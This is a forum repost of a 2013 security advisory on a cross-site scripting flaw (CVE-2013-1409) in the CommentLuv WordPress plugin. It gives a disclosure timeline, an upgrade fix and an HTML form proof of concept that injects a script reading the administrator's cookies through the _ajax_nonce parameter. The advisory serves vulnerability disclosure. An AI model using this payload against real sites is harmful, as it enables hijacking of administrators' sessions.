Post Thu Feb 07, 2013 2:26 am

HTB23138: Cross-Site Scripting (XSS) in CommentLuv WordPress Plugin

Advisory ID: HTB23138
Product: CommentLuv WordPress plugin
Vendor: Andy Bailey
Vulnerable Versions: 2.92.3 and probably prior
Tested Version: 2.92.3
Vendor Notification: January 16, 2013
Vendor Fix: January 17, 2013
Public Disclosure: February 6, 2013
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2013-1409
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab
https://www.htbridge.com/advisory/

Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in CommentLuv WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks.

1) Cross-Site Scripting (XSS) in CommentLuv wordpress plugin: CVE-2013-1409
The vulnerability exists due to insufficient filtration of user-supplied data in "_ajax_nonce" HTTP POST parameter in the "/wp-admin/admin-ajax.php" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoC (Proof-of-Concept) below uses the "alert()" JavaScript function to display administrator's cookies:
<form action="http://[host]/wp-admin/admin-ajax.php" method="post" name="askform">
<input type="hidden" name="action" value="cl_ajax" />
<input type="hidden" name="do" value="fetch" />
<input type="hidden" name="url" value="1" />
<input type="hidden" name="_ajax_nonce" value='<script>alert(document.cookie);</script>'/>
<input type="submit" id="btn">
</form>

Solution:
Upgrade to CommentLuv 2.92.4

More Information:
http://wordpress.org/extend/plugins/com ... changelog/


References:
[1] High-Tech Bridge Advisory HTB23138 - https://www.htbridge.com/advisory/HTB23138 - Cross-Site Scripting (XSS) Vulnerability in CommentLuv WordPress Plugin.
[2] CommentLuv - http://www.commentluv.com/ - CommentLuv is a popular WordPress plugin that will magnetize your readers, socialize your comments and viralize your posts.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org/ - targeted to developers and security practitioners, CWE is a formal list of software weakness types.